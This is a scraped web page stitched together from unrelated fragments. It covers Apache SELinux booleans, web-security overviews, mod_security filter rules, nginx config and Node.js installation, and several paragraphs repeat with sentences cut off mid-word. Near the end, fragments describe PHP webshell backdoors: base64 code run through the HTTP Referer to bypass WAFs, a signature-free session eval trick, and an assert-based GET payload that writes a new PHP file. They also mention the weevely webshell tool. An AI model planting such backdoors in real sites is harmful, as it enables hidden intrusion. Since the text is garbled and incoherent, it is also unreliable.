--> off
Httpd_can_network_memcache --> off
Httpd_can_network_relay --> off
Httpd_can_sendmail --> off
Httpd_dbus_avahi --> on
Httpd_enable_cgi --> on
Httpd_enable_ftp_server --> off
Httpd_enable_homedirs --> off
Httpd_execmem --> off
Httpd_read_user_content --> off
Httpd_setrlimit --> off
Httpd_ssi_exec --> off
Httpd_tmp_exec --> off
Httpd_tty_comm --> on
Httpd_unified --> on
Httpd_use_cifs --> off
Httpd_use_gpg --> off
Httpd_use_nfs --> off to disable Apache cgi support, enter:
# Setsebool-P
Security-gu Ruo Jin Tang?XSS cross-siteThe script attacks Cross Site Script.There are two main Prevention Measures: Disinfection; HTTPOnly?Injection attacksSQL Injection and OS injection.SQL Injection prevention measures:DisinfectParameter binding (preprocessing)?Csrf attackCross Site Request Forgery cross-site request forgery.The primary defense means is to identify the requester. Mainly include form tokens, verification codes, and referrer check.?Web Application FirewallTokens can be automatic
secure operating system, fix vulnerabilities in time, and install anti-virus software firewall. Prevent viruses and backdoors. Set firewall policies, establish DDOS defense systems, use attack detection systems, and perform subnet isolation.
Application System Security: when developing a program, you can use the correct method to solve common problems. Prevents cross-site scripting attacks (XSS), injection attacks, Cross-Site Request Forgery (CSRF), error messages, HTML comments, file uploads,
, choose a safe operating system, timely repair the vulnerability, install anti-virus software firewall. Guard against the virus, back door. Set up firewall policy, set up DDoS defense system, use attack detection system, sub-network isolation and other means.Application security: When developing a program, use the correct way to solve a known common problem, at the code level. Prevent cross-site scripting attacks (XSS), injection attacks, cross-site request forgery (CSRF), error messages, HTML
, see Red Hat SELinux guide.
#21: Install Mod_security
ModSecurity is an open-source Web application engine for intrusion detection and prevention. Installing mod_security can protect Apache and PHP applications from XSS and Other Attacks:
## A few Examples ## # Do not allow to open files in /etc/ SecFilter /etc/ # Stop SQL injection SecFilter "delete[[:space:]]+from" SecFilter "select.+from"
#22: if possible, run Apache/PHP under Chroot Jail
Running
, choose a safe operating system, timely repair the vulnerability, install anti-virus software firewall. Guard against the virus, back door. Set up firewall policy, set up DDoS defense system, use attack detection system, sub-network isolation and other means.Application security: When developing a program, use the correct way to solve a known common problem, at the code level. Prevent cross-site scripting attacks (XSS), injection attacks, cross-site request forgery (CSRF), error messages, HTML
off Httpd_dbus_avahi --on httpd_enable_cgi--on Httpd_enable_ftp_server--off Httpd_enable_homedirs and off Httpd_execmem-- Gt Off Httpd_read_user_content---off Httpd_setrlimit-off httpd_ssi_exec----httpd_tmp_exec-off HTTP D_tty_comm-On httpd_unified-on httpd_use_cifs-off HTTPD_USE_GPG-off Httpd_use_nfs--off
To cancel Apache CGI support, you can enter:
# setsebool-p httpd_enable_cgi off
Detailed reference: Red Hat SELinux Guide
#21: Installing Mod_security
Mo
. Including infrastructure security, application system security, data security and so on.Infrastructure security: Hardware procurement, operating system, network environment security. General use, the formal channel to buy high-quality products, choose a safe operating system, timely repair the vulnerability, install anti-virus software firewall. Guard against the virus, back door. Set up firewall policy, set up DDoS defense system, use attack detection system, sub-network isolation and other m
uploads, path traversal, and more. You can also use the Web application firewall (for example: modsecurity) for security vulnerability scanning and other measures to enhance application-level security.Data security: Storage security (presence in reliable devices, real-time, scheduled backups), preservation of security (important information to encrypt the preservation, selection of suitable personnel for complex preservation and detection, etc.), tra
, file uploads, path traversal, and more. You can also use the Web application firewall (for example: modsecurity) for security vulnerability scanning and other measures to enhance application-level security.Data security: Storage security (presence in reliable devices, real-time, scheduled backups), preservation of security (important information to encrypt the preservation, selection of suitable personnel for complex preservation and detection, etc.
verification code is a bad user experience, not necessary to not easily use the verification code, many of the current practice is that if a short period of time to submit a form is not successful after the request to provide a verification code, This will get a better user experience.
Add: Firewall is an important guarantee of web security, Modsecurity is the leader in open source Web firewall. The enterprise firewall should be set up with
on Fedoranode. JS is included in the base repository of Fedora. Therefore You can use the yum to install node. js on Fedora.$ sudo yum install NPMIf you want to install the latest version of node. js, you can build it from its source as follows.$ sudo yum groupinstall ' development Tools '$ wget http://nodejs.org/dist/node-latest.tar.gz$ tar xvfvz node-latest.tar.gz$ cd node-v0.10.21 (replace a version with your own)$./configure$ Make$ sudo make installInstall node. js on CentOS or RHELTo insta
Editor: "In nine to 12 months, it will be widely used ." This is a long time on the speed-first Internet.
Currently, attackers do not need to have a deep understanding of network protocols by using attack software that is everywhere on the Internet, such as changing the Web site homepage and getting the administrator password, damage the entire website data and other attacks. The network layer data generated during these attacks is no different from the normal data. Traditional firewalls have no
select * from table; commint; after executing these two SQL statements, it is equivalent to not inserting data. If we use a session-level temporary table, even if we use commit, the content in the temporary table still exists. The content in the temporary table is cleared only when the session is disconnected. Therefore, in the actual development process, we use different types of temporary tables for this combination scenario. During the development of the proposed proposal system, I used a se
($ ch, $ options );Echo curl_exec ($ ch );
Use HTTP_REFERER in the HTTP request to run base64-encoded code to achieve the backdoor effect. Generally, waf requires loose or no referer detection. Bypass
Waf is good.
PHP webshell generation tool weevely
Weevely is a free software for PHP webshell. It can be used to simulate a connection shell similar to telnet. weevely is usually used to exploit web progr
without features:
Assign the content of $ _ POST ['code'] to $ _ SESSION ['thecode'] and then execute $ _ SESSION ['thecode']. The highlight is that there is no signature. If you use a scanning tool to check the code, no alarm will be triggered.Super hidden php backdoor:
Only the GET function constitutes a Trojan;Usage:? A = assert B =$ {fputs % 28 fopen % 28base64_decode % 28Yy5waHA % 29, w % 29, base64_decode % bytes % 29% 29 };
After execution, the current directory generates c. php one-
:9020 weight=1; } sendfile off; #tcp_nopush on; Server_names_hash_bucket_size 128;## start:timeouts # # Client_body_timeout 10; Client_header_timeout 10; Keepalive_timeout 80; Send_timeout 10; Keepalive_requests 10;## end:timeouts # # #gzip on; server {#这个很关键 ~ ~ It is the port of Nginx listening Oh ~ ~ Listen 8080; server_name localhost; #charset Koi8-r; #access_log logs/host.access.log main;# for naxsi Remove the "single" line for learn mode, or the "# Lin
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.